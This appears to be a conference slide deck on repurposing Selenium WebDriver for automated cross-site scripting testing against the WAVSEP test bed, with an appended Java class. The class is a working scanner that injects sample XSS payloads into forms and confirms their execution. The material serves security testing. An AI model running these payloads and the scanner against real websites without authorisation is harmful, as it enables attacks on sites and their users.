Post on 07-Aug-2015
Adrian Rapan, LMAX
Re-purposing Webdriver
for
Security Testing
www.eurostarconferences.com
@esconfs #esconfs
Security testing
• Open Web Application Security Project (OWASP)
• MITM (man-in-the-middle) attack
• DoS attack
• Metasploit
• BackTrack (Linux distribution used in penetration testing)
• Acunetix, Netsparker, N-Stalker, ProxyStrike, XSSS
What about…
• Webdriver?
• It tests websites
• Drivers for different browser/OS pairs
• With a bit of tinkering it can manipulate the DOM
How
• The test bed: Web Application Vulnerability Scanner Evaluation Project (WAVSEP)
– Reflected/Stored Cross-Site Scripting (XSS): 66 test cases, implemented in 64 jsp pages (GET & POST)
– 7 different categories of false-positive Reflected XSS test cases (GET & POST)
– Payloads comprising 44 attack vectors
Ingredients
• The attack vectors: the OWASP XSS Filter Evasion Cheat Sheet,
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet, saved as an XML file
• Javascript snippets like:
<INPUT TYPE="IMAGE" SRC="javascript:alert('CrossSiteScriptingAcademia12');"></script>
Transparency
• Commercial tools… how do they do it?
• The security scanners tell you about vulnerabilities
• They'll even offer a solution
• But they don't show you how the vulnerability was found
What about…
• Webdriver?
• Drives the browser just like a tester would
• Total transparency: you can see exactly what each test did and why it passed or failed
• Every security test runs in a real browser
• Lower false-positive rate of detection
Test case
• The browser navigates to the required webpage
• Webdriver scans for input forms which represent the delivery channel for the XSS payloads
• The XSS attack vectors are inserted in the input fields of the form
• The form is submitted
• The success of the attack is verified by detecting the execution of the Javascript snippet
Under the hood
• Getting the urls from a website as an XML
– A few online tools exist; used http://www.xml-sitemaps.com/crawlproc.html?&initurl=<<website>>
Under the hood
• Each url is opened by webdriver and scanned for FORMs
allForms = driver.findElements(By.xpath("//form"));
• All inputs from the FORM
allInputs = form.findElements(By.xpath(".//input"));
• Each input is populated by the attack vector
input.sendKeys(vector);
Under the hood
• Submit the injected FORM
form.findElement(By.xpath(".//input[@type='submit']")).click();
• Repeat for each FORM from each url
Under the hood
• The actual WebDriver test for a URL
webDriver.attack(urlToAttack).using(attackVector).run();
webDriver.executionReportFor(attackVector).waitFor();
Now for the tricky part
• Detecting whether the attack succeeded
• There is a manual way… but it's like watching paint dry
The automated way
driver.switchTo().alert()
• But what if the payload is sitting in the DOM, waiting for a triggering event like a click?
Another “dirty” automated way
• Use the infamous JavascriptExecutor
((JavascriptExecutor) driver).executeScript(payloadToExecute);
• It goes against the intended usage of Webdriver – to test as a tester would
And the method is
• Running an XPath over the attributes to find the "hidden" payload, then executing it
((JavascriptExecutor) driver).executeScript("return (document.evaluate(\"//@*[contains(.,'<<the attack vector>>')]\", document, null, XPathResult.STRING_TYPE, null)).stringValue")
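The whole loop from the "Test case" and "Under the hood" slides through to the detection step, as one Java class against the Selenium WebDriver API the slides quote. This is an added example, not the talk's or LMAX's code; FirefoxDriver, the WAVSEP URL in main() and the inline vector list are assumptions. It departs from the slide above in one place: rather than handing the found payload to JavascriptExecutor to execute (which only proves the browser can run JavaScript), it hooks alert() and dispatches events at the elements carrying the payload, so a hit means the application's own markup ran the handler.

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import org.openqa.selenium.Alert;
import org.openqa.selenium.By;
import org.openqa.selenium.JavascriptExecutor;
import org.openqa.selenium.NoAlertPresentException;
import org.openqa.selenium.WebDriver;
import org.openqa.selenium.WebElement;
import org.openqa.selenium.firefox.FirefoxDriver;

// Added example, not the talk's own code. Needs selenium-java on the classpath and a
// browser/driver pair; FirefoxDriver and the WAVSEP URL in main() are assumptions.
public class XssFormProbe {
    // Fixed canary inside every alert(). Detection matches on this token, not on the raw
    // vector, whose quotes would otherwise need escaping inside an XPath string literal.
    static final String CANARY = "CrossSiteScriptingAcademia12";

    // Constructed sample in the style of the OWASP XSS Filter Evasion Cheat Sheet; a real
    // run would load the vectors saved as XML instead of this inline list.
    static final List<String> VECTORS = Arrays.asList(
        "<script>alert('" + CANARY + "')</script>",
        "\" onmouseover=\"alert('" + CANARY + "')\" x=\"",
        "'><svg onload=alert('" + CANARY + "')>");

    // Browser-side script: replace alert() with a counter so triggered handlers report instead
    // of blocking the driver, then fire common events on elements whose attributes hold the canary.
    static final String TRIGGER_HIDDEN_PAYLOADS =
        "var canary = arguments[0], hits = 0;"
        + "window.alert = function (m) { if (String(m).indexOf(canary) !== -1) { hits++; } };"
        + "var r = document.evaluate(\"//*[@*[contains(., '\" + canary + \"')]]\", document, null,"
        + "    XPathResult.ORDERED_NODE_SNAPSHOT_TYPE, null);"
        + "var events = ['click', 'mouseover', 'focus', 'load', 'error'];"
        + "for (var i = 0; i < r.snapshotLength; i++) { for (var j = 0; j < events.length; j++) {"
        + "  try { r.snapshotItem(i).dispatchEvent(new Event(events[j])); } catch (e) {} } }"
        + "return hits;";

    public static void main(String[] args) {
        String url = "http://localhost:8080/wavsep/";   // assumed local WAVSEP deployment
        WebDriver driver = new FirefoxDriver();
        try {
            for (String hit : attack(driver, url)) System.out.println(url + ": " + hit);
        } finally {
            driver.quit();
        }
    }

    // Runs every vector through every FORM on the page; one entry per confirmed execution.
    static List<String> attack(WebDriver driver, String url) {
        List<String> hits = new ArrayList<>();
        driver.get(url);
        int formCount = driver.findElements(By.xpath("//form")).size();
        for (String vector : VECTORS) {
            for (int i = 0; i < formCount; i++) {
                drainAlerts(driver);   // an alert left open makes the next WebDriver command fail
                driver.get(url);       // the last submit navigated away: reload and re-find the form,
                WebElement form = driver.findElements(By.xpath("//form")).get(i); // old ones are stale
                fillTextInputs(form, vector);
                submit(form);
                if (drainAlerts(driver) || triggeredHiddenPayload(driver)) {
                    hits.add(vector + " via form #" + i);
                }
            }
        }
        return hits;
    }

    // Types the vector into every field a user could type into: sendKeys() on a hidden or
    // submit input throws, and a maxlength attribute silently truncates the vector.
    static void fillTextInputs(WebElement form, String vector) {
        String typeable = ".//input[not(@type) or @type='text' or @type='search'"
            + " or @type='url' or @type='email'] | .//textarea";
        for (WebElement input : form.findElements(By.xpath(typeable))) {
            input.clear();
            input.sendKeys(vector);
        }
    }

    static void submit(WebElement form) {
        List<WebElement> buttons = form.findElements(
            By.xpath(".//input[@type='submit'] | .//button[not(@type) or @type='submit']"));
        if (buttons.isEmpty()) form.submit();   // WebDriver can submit a form that has no button
        else buttons.get(0).click();
    }

    // Accepts every open alert; true if one carried the canary, meaning the payload already ran.
    static boolean drainAlerts(WebDriver driver) {
        boolean ours = false;
        while (true) {
            try {
                Alert alert = driver.switchTo().alert();
                ours |= alert.getText().contains(CANARY);
                alert.accept();
            } catch (NoAlertPresentException e) {
                return ours;
            }
        }
    }

    // Payload parked in an attribute, waiting for an event: provoke it and count alert() calls.
    static boolean triggeredHiddenPayload(WebDriver driver) {
        Object fired = ((JavascriptExecutor) driver).executeScript(TRIGGER_HIDDEN_PAYLOADS, CANARY);
        return ((Number) fired).longValue() > 0;
    }
}
```

Two practical notes: Selenium 3 and later need geckodriver on the PATH for FirefoxDriver, and the alert-hook approach cannot confirm a javascript: URL in an IMG SRC (the INPUT TYPE="IMAGE" snippet earlier on this page), because modern browsers do not execute those at all; for that class of vector the reflection is worth reporting but cannot be counted as an execution.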
Some conclusions
• Writing tests to cover security test cases isn’t that hard
• The attack vectors for XSS are publicly available
• Using Webdriver as a security tool might be slow but offers more transparency
• Best of all, it’s free